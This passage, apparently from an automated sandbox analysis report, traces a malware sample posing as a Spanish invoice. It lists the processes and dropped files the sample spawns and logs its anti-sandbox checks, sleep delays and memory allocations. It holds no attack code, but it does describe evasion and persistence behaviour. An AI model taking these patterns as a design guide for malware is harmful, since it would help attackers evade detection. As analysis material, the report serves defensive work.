                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Yara detected AntiVM3
                  Source: Yara matchFile source: Process Memory Space: Factura modificada____678979879.exe PID: 7780, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WrappedObject.exe PID: 5784, type: MEMORYSTR
                  Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002A5D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeMemory allocated: 2E10000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeMemory allocated: 2B60000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeMemory allocated: E80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeMemory allocated: 29A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMemory allocated: 6B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMemory allocated: 2450000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMemory allocated: 4450000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMemory allocated: 8E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMemory allocated: 2450000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeMemory allocated: 2230000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 595014Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594884Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594765Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594655Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594546Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeThread delayed: delay time: 594437Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exeThread delayed: delay time: 922337203685477
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeWindow / User API: threadDelayed 2955Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exeWindow / User API: threadDelayed 6806Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeWindow / User API: threadDelayed 3083Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeWindow / User API: threadDelayed 6728Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep count: 36 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -33204139332677172s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -100000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7928Thread sleep count: 2955 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -99594s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7928Thread sleep count: 6806 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -99383s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -98782s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -98576s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -98466s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -98297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -98188s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -98078s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97235s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -97110s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96985s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Factura modificada____678979879.exe TID: 7824Thread sleep time: -96610s >= -30000sJump to behavior
